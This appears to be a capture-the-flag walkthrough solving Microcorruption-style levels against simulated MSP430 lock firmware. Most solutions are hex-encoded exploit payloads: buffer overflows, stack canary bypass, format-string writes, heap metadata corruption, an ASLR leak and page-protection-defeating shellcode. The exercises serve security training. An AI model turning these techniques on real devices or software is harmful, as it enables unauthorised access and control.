built in, and one available port  to which the LockIT Pro Deadbolt
should be connected.

This is  Software Revision 02.  We have received reports  that the
prior  version of  the  lock was  bypassable  without knowing  the
password. We have fixed this and removed the password from memory.

Solution:
Break main and type “c”.

Investigate the check_password function.

Notice “check_password” reads our input sequentially and compares it.

Taking into account that the machine deals in 16-bit little endian, the comparisons translate to:
0x3c72     = r<
0x515b     = [Q
0x582d     = -X
0x4f69     = iO

Password: r<[Q-XiO

Type “reset”, “solve”, and enter the password.

Level 3: Hanoi

OVERVIEW

– This lock is attached the the LockIT Pro HSM-1.
– We have updated  the lock firmware  to connect with the hardware
security module.

DETAILS

The LockIT Pro b.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

Solution:
Break main and type “c”.

Investigate the “login” function.

Notice at address 0x455a that there is a comparison instruction: cmp.b    #0x40, &0x2410

0x40 = @

Type ‘c’, input: aaaabbbb, and send.

Notice in the live memory dump that our input starts at address 0x2400.

We can now calculate the offset to bypass the password authentication:
2410 – 2400 = 16

Testing our calculations:
python -c “print ‘a’ * 16 + ‘@'”
reset
c
c
Input: aaaaaaaaaaaaaaaa@
Send
c

String that allows bypass: aaaaaaaaaaaaaaaa@

Type “solve”, input the “password” and send.

Level 4: Reykjavik

OVERVIEW

– Lockitall developers  have implemented  military-grade on-device
encryption to keep the password secure.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.03  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There is  no default password  on the LockIT  Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro  App and  entering a password  when prompted,  and then
restarting the LockIT Pro using the red button on the back.

This is Hardware  Version A.  It contains  the Bluetooth connector
built in, and one available port  to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 02. This release contains military-grade
encryption so users can be confident that the passwords they enter
can not be read from memory.   We apologize for making it too easy
for the password to be recovered on prior versions.  The engineers
responsible have been sacked.

Solution:
Break main and type “c”.

Note the call to 0x2400

Break 2400 and type “c”.

Type “read 2400 180”.

Copy the output and paste it into a file “reykjavik.txt”.

Run “get_instructions.py”:
python get_instructions.py

Copy the output, open the Assembler in a new tab, paste the output and click on “Disassemble”.

Note the following instruction:
cmp    #0x869d, -0x24(r4)

Type “c” and input “aaaa”.

Notice the register state:

As per the instruction: cmp    #0x869d, -0x24(r4)
-0x24(r4) = 0x43fe – 0x24 = 0x43da

Looking at the live memory dump, we can see that 0x43da is the start of our input.
This means the instruction is comparing our input to 0x869d

Password (hex-encoded input): 9d86

Type “reset”, “solve”, and enter the password.

Level 5: Cusco

OVERVIEW

– We have fixed issues with passwords which may be too long.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 02. We have improved the security of the
lock by  removing a conditional  flag that could  accidentally get
set by passwords that were too long.

Solution:
Break main and type “c”.

We will break at login’s ret address.

Break 453e and type “c”.
python -c “print ’41’ * 20”

Input (hex-encoded): 4141414141414141414141414141414141414141
send
c

Type “read sp 8”.

Notice that our input starts at 0x43ee and the stack pointer is at 0x43fe
python -c “print 0x43fe – 0x43ee”

The result is 16.

We will aim to perform a buffer overflow.

unlock_door starts at 4446.
With the information we have we can now bypass authentication by perform a buffer overflow.

Performing the buffer overflow:
python -c “print ’41’ * 16 + ‘4644’”

Password (hex encoded input): 414141414141414141414141414141414644

Type “reset”, “solve”, and enter the password.

Level 6: Whitehorse

OVERVIEW

– This lock is attached the the LockIT Pro HSM-2.
– We have updated  the lock firmware to connect with this hardware
security module.

DETAILS

The LockIT Pro c.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision  01. The firmware  has been  updated to
connect with the new hardware security module. We have removed the
function to unlock the door from the LockIT Pro firmware.

Solution:
Break main and type “c”.

Break 4514 and type “c”.

Break 452e and type “c”.
python -c “print ’41’ * 20”

Input (hex-encoded): 4141414141414141414141414141414141414141
Send
c

Type “read sp 8”.

Notice our input starts at 0x3600 and the stack pointer is at 0x3610
This means the offset is 16

We will aim to perform a buffer overflow by using the interrupt called by conditional_unlock_door.

Looking at the manual, we can see that INT 0x7f is just what we need.

This interrupt is at 4460.

Performing the buffer overflow:
python -c “print ’41’ * 16 + ‘60447f'”

Password (hex encoded input): 4141414141414141414141414141414160447f

Type “reset”, “solve”, and enter the password.

Level 7: Montevideo

OVERVIEW

– Lockitall developers  have rewritten the code  to conform to the
internal secure development process.
– This lock is attached the the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.03  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is Software Revision 03. We have received unconfirmed reports
of issues with the previous series of locks. We have reimplemented
much  of the  code according  to our  internal Secure  Development
Process.

Solution:
Break main and type “c”.

Notice that Montevideo looks very similar to Whitehorse.
We will try the same solution.

Trying the Whitehorse solution:
c

Input (hex-encoded): 4141414141414141414141414141414160447f
c

The same solutions works!

Type “reset”, “solve”, and enter the password.

 

Level 8: Johannesburg

OVERVIEW

– A firmware update rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.04  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 04. We have improved the security of the
lock by ensuring passwords that are too long will be rejected.

Solution:
Break main and type “c”.

Notice 0x4578 in login has cmp.b    #0x18, 0x11(sp)

Break 4590 and type “c” twice.
python -c “print ’41’ * 16”

Input (hex-encoded): 41414141414141414141414141414141
Send
c

Notice that there is an 18, 18 bytes after our input.
This 18 acts as a stack canary.
Stack canaries are basically integers that are placed just before the stack pointer. Similar to canaries in a coal mine, if the integer gets overwritten, the program knows that there was a buffer overflow attempt.

Notice that unlock_door starts at address 4446.

Performing the buffer overflow:
python -c “print ’41’ * 17 + ’18’ + ‘4644’”

Password (hex encoded input): 4141414141414141414141414141414141184644

Type “reset”, “solve”, and enter the password.

Level 9: Addis Adaba

OVERVIEW

– We have verified passwords can not be too long.
– Usernames are printed back to the user for verification.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.03  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 03. We have improved the security of the
lock by ensuring passwords can not be too long.

Solution:
Break main and type “c”.

Notice the use of “printf”. This means that format string vulnerabilities could be one vector of attack.

Break at the tst instruction (448a) and type “c”.

At the input prompt don’t type anything and type “c”.

Notice that the address being tested is 0x3c50
This means we have to write a number to that address in order to skip the jz instruction and call unlock_door.

Testing the format string theory:
reset
c
c

Input: 503c%i%n

A format string attack is possible.
The %n parameter will write the number of characters to 0x503c, hence giving us the non-zero number.
In this case, the %n will write a 2.

Confirming our attack:
reset
c
c

Input: 503c2569256e

Our attack works. Time to solve the challenge.

Password (hex encoded input): 503c2569256e

Type “reset”, “solve”, and enter the password.

 

Level 10: Santa Cruz

OVERVIEW

– A firmware update further rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.05  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 05.  We have added further mechanisms to
verify that passwords which are too long will be rejected.

Solution:
Break main and type “c”.

Notice the address of unlock_door is 0x444a

Type “c” enter a username and password and type “c” again.

Notice the following addresses:
user is at 0x43a2
password at 0x43b5
stack pointer is at 0x43a0
ret address at 0x43cc

Inspect the login function:
Notice the mov.b -0x18(r4), r15 at login’s 0x45e4

Type “read r4-18”:

The resulting address is 0x43b4 and it has a value of 0x10
Notice the mov.b -0x19(r4), r15 at login’s 0x45fa

Type “read r4-19”:

The resulting address is 0x43b3 and it has a value of 0x08
Notice the tst.b -0x6(r4) at login’s 0x464c and the jz #0x465e <login+0x10e> at login’s 0x4650

Type “read r4-6”:

The resulting address is 0x43c6, meaning 0x43c6 must be 0x0
We want to overwrite the ret address with that of unlock_door
We also want to make sure that the value of 0x43b3 is lower than our password length and 0x43b4 is higher than our password length

Use Python to make calculations:
python -c “print 0x43cc – 0x43a2”
The result is 42

python -c “print (’61’ * 17) + ’01’ + (’61’ * 24) + ‘4a44′”
The result will be our username

We want to overwrite the 0x43c6 address with 0x0
python -c “print 0x43c6 – 0x43b5”
The result is 17

python -c “print ’62’ * 17 + ’00′”
The result will be our password

Testing the theory:
reset
c
c
user (hex-encoded): 6161616161616161616161616161616161016161616161616161616161616161616161616161616161614a44
c
pass (hex-encoded): 626262626262626262626262626262626200
c

We have our solution and are ready to pass the challenge.

Username (Hex encoded input): 6161616161616161616161616161616161016161616161616161616161616161616161616161616161614a44
Password (Hex encoded input): 626262626262626262626262626262626200

Type “reset”, “solve”, and enter the password.

Level 11: Jakarta

OVERVIEW

– A firmware update further rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.06  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 06.  We have added further mechanisms to
verify that passwords which are too long will be rejected.

Solution:

Break main and type “c”.

Notice unlock_door is at 0x444c
We will use the interrupt at 4450 to unlock the door.

Notice the cmp.b #0x21, r11 in login’s 0x45ae
This checks for the username meeting the 0x20 limit

Notice the add    r11, r15 at 0x45fe and the cmp.b #0x21, r15 at 0x4600
These check for the combined length of user and pass against 0xff

Type “c” and use Python to calculate the username:
c
python -c “print ’61’ * 32”
Input (hex-encoded): 6161616161616161616161616161616161616161616161616161616161616161

Type “c” and use Python to calculate the password:
c
python -c “print ’61’ * 4 + ‘4c44′ + ’62’ * 218”
Input: 616161614c446262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262

Type “c” twice:
c
c

We have our solution and can now pass the challenge.

Username (Hex encoded input): 6161616161616161616161616161616161616161616161616161616161616161

Password (Hex encoded input): 616161614c446262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262

Type “reset”, “solve”, and enter the password.

 

Level 12: Novosibirsk

OVERVIEW

– This lock is attached the the LockIT Pro HSM-2.
– We have added features from b.03 to the new hardware.

DETAILS

The LockIT Pro c.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is Software Revision 02. We have improved the security of the
lock by ensuring passwords can not be too long.

Solution:

Break main and type “c”.

…

Notice the printf; there may be a format string vulnerability.

Break at 0x448e, which is a test:
break 448e
c
Input: aaaa
c

Notice that conditional_unlock_door pushes 0x7e to INT at 0x44c6

We want to overwrite it to 0x7f, so that INT 0x7f gets called instead
0x7f = 127

So we can do:
0x44c8 + 125 A’s + %n

The %n will overwrite the 0x7e with 0x7f (127)

Testing the format string theory:
reset
c
c
python -c “print ’44c8′ + ‘A’ * 125”

Input: 44c8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%n

Our exploit will look like: c844 + (125 A’s) + 256e

Testing our format string theory:
reset
c
c
Input (hex-encoded): c8446161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161256e

We have our solution and can now pass the challenge.

Username (Hex encoded input): c8446161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161256e

Type “reset”, “solve”, and enter the password.

 

Level 13: Algiers

OVERVIEW

– This lock contains the all-new LockIT Pro Account Manager.

DETAILS

The LockIT Pro d.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

LockIT Pro Account Manager solves the problem of sharing passwords
when  multiple users  must  have  access to  a  lock. The  Account
Manager contains  a mapping of users  to PINs, each of  which is 4
digits.  The  system supports  hundreds of users,  each configured
with his or her own PIN,  without degrading the performance of the
manager.

There are no accounts set up  on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts  and  their  PINs.  User  accounts  are  by  default  not
authorized  for access,  but can  be authorized  by attaching  the
Account  Manager  Authorizer.  This  prevents  users  from  adding
themselves to the lock during its use.

This is Hardware  Version D.  It contains  the Bluetooth connector
built in, and one available port, to which the LockIT Pro Deadbolt
should be connected. When authorizing PINs, the Deadbolt should be
disconnected and the Authorizer should be attached in its place.

This   is  Software   Revision   01.  It is a  much more  advanced
version of other locks, but the first Version D release.

Solution:
Break main and type “c” two times.
user: aaaa
pass: bbbb
c

Notice that we have metadata headers before our input.

The header contains:
(1) Pointer to the previous block
(2) Pointer to the next block
(3) The size of the block
(4) Status of the block; whether it’s allocated or free

We have two blocks, each 16 bytes big, and they’re next to each other.
Also notice that there is no check on the length of input.
This means we can overwrite the header of the second block and make it point to wherever we want.

Notice that unlock_door is at 0x4564 and free’s ret address is right behind at 0x4562
This means we can use NOPs to slide into unlock_door.

The exploit will look like:
16 A’s + 4444 + 6245 + 0100

Generate the exploit with Python:
python -c “print ’61’ * 16 + ‘4444’+ ‘6245’ + ‘0100’”

Testing the theory:
reset
c
c
user (hex-encoded): 61616161616161616161616161616161444462450100
pass: <blank>
c
c

We have our solution and can now pass the challenge.

Username (Hex encoded input): 61616161616161616161616161616161444462450100

Type “reset”, “solve”, and enter the password.

 

Level 14: Vladivostok

OVERVIEW

– Lockitall  developers further used the hardware randomization to
improve lock security.
– This lock is attached the the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.05  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

Despite the  year of development  effort which  went in to  it, we
have heard  reports that  the memory  protection introduced  in to
LockIT Pro r e.01 is insufficient. We have removed this feature in
favor of  the tried-and-true HSM-2. The  engineers responsible for
LockIT Pro r e.01 have been sacked.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision 05.  We have implemented  new state-of-
the-art techniques to prevent any futher lock issues.

Solution:
Break main and type “c”:

We see that ASLR is implemented.
Adress Space Layout Randomization is a protection mechanism that guards against buffer overflows by randomizing the location where executables are loaded in memory. What this means is that the addresses to overwrite will always vary.

We can also see printf at 0x476a, which might mean a format string vulnerability.
Also notice the INT at 0x48ec

Calculations for exploit development:
0x48ec – 0x476a = 0x182

Testing the format string theory:
c
Input: %x%x
c
c

The program is vulnerable to format string attacks.
Also notice how everything was overwritten.

The address of printf is 0x6c56

The password should be:
8 random bytes + (printf_addr + 0x182) + 2 random bytes + 7f00

Write a Python script to get us the password:

Run the script and test the exploit:
python vladivostok.py

Password (Hex encoded input): 4141414141414141d86d42427f00
c

We have our solution and can now pass the challenge.

Type “solve”.

Password (Hex encoded input): 41414141414141411e7942427f00

 

Level 15: Bangalore

OVERVIEW

– The lock uses the first MSP430 ever to have memory protection.
– This lock is attached the the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

Lockitall engineers  have worked for  over a year to  bring memory
protection to  the MSP430—a  truly amazing achievement.  Each of
the 256  pages can  either be executable  or writeable,  but never
both, finally  bringing to  a close  some of  the issues  in prior
versions.

This  is Hardware  Version  C. It  contains  the all-new  modified
MSP430  with hardware  memory protection.   This hardware  version
also contains the Bluetooth connector  built in, and two available
ports: the LockIT Pro Deadbolt should  be connected to port 1, and
the LockIT Pro HSM-2 should be connected to port 2.

This is Software Revision 01. The new firmware supports the memory
protection we have introduced in this new hardware version.

Solution:
Break main and type “c”:

Notice this program has Data Execution Prevention (DEP) enabled.
Both the manual and the program shows that pages are either executable or writable.
0x1 makes the page writable and 0x0 makes the page executable.

Type “c” and use Python for input:
c
python -c “print ’61’ * 20”
Input (hex-encoded): 6161616161616161616161616161616161616161

Notice our input starts at 0x3fee

Reset.
reset
c
c
python -c “print ’61’ * 16 + ‘ee3f'”
Input (hex-encoded): 61616161616161616161616161616161ee3f
c

We get a segmentation fault, saying it cannot execute a write-only page.

We need to set the page where our input is to executable (0x44ba)
The format we will use is:
<shellcode><buffer><mark_page_executable><page num><executable mark><input addr>

This will mark our input page as executable and then execute our shellcode.

Go to the Assembler.
Assemble:
mov       #0xff00, sr
call      #0x10

Where 0xff00 is 0x8000 + 0x7f00

The assembled objects are: 324000ffb0121000

Use Python to calculate the password:
python -c “print ‘324000ffb0121000′ + ’61’ * 8 + ‘ba44’ + ‘3f00’ + ‘0000’ + ‘ee3f'”

Password (Hex encoded input): 324000ffb01210006161616161616161ba443f000000ee3f

Type “reset”, “solve”, and enter the password.

 

Level 16: Lagos

OVERVIEW

– Passwords may now only contain alphanumeric characters.
– This lock is attached the the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.04  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision  04. Due to  user confusion  over which
characters passwords may contain,  only alphanumeric passwords are
accepted.

Solution:
Note that this level only accepts alphanumeric characters, so we can only use: 0x30-0x39, 0x41-0x5a and 0x61-0x7a

Break main and type “c” twice:
Input: 111122223333

Notice we have a 200-byte space to play with, starting from 0x2400

Type “c”:
c

Notice our input starts at 0x43ed, and the return address is at 0x43fe

43fe – 43ed = 17

Our buffer will consist of 17 characters.

We want to call INT 0x7f in order to unlock the door.

Notice that 0x4654 in getsn is within our limited range and allows us to enter more input that is unconstrained.
We will return to 0x4654, specify the address to write to, the input size and the return address.

Use Python to make the calculations:
python -c “print ’41’ * 17 + ‘5446’ + ‘3044’ * 3”

Reset.
c
c
Input (hex-encoded): 41414141414141414141414141414141415446304430443044
c
Wait

Go to the Assembler.
Assemble:
push #0x7f
call  #0x45fc

Assembled objects: 30127f00b012fc45

These assembled objects are how we issue the INT to bypass authentication.

Remember:

Back in the input prompt:
c
Input (hex-encoded): 30127f00b012fc45
c

We have our solution and can now pass the challenge.

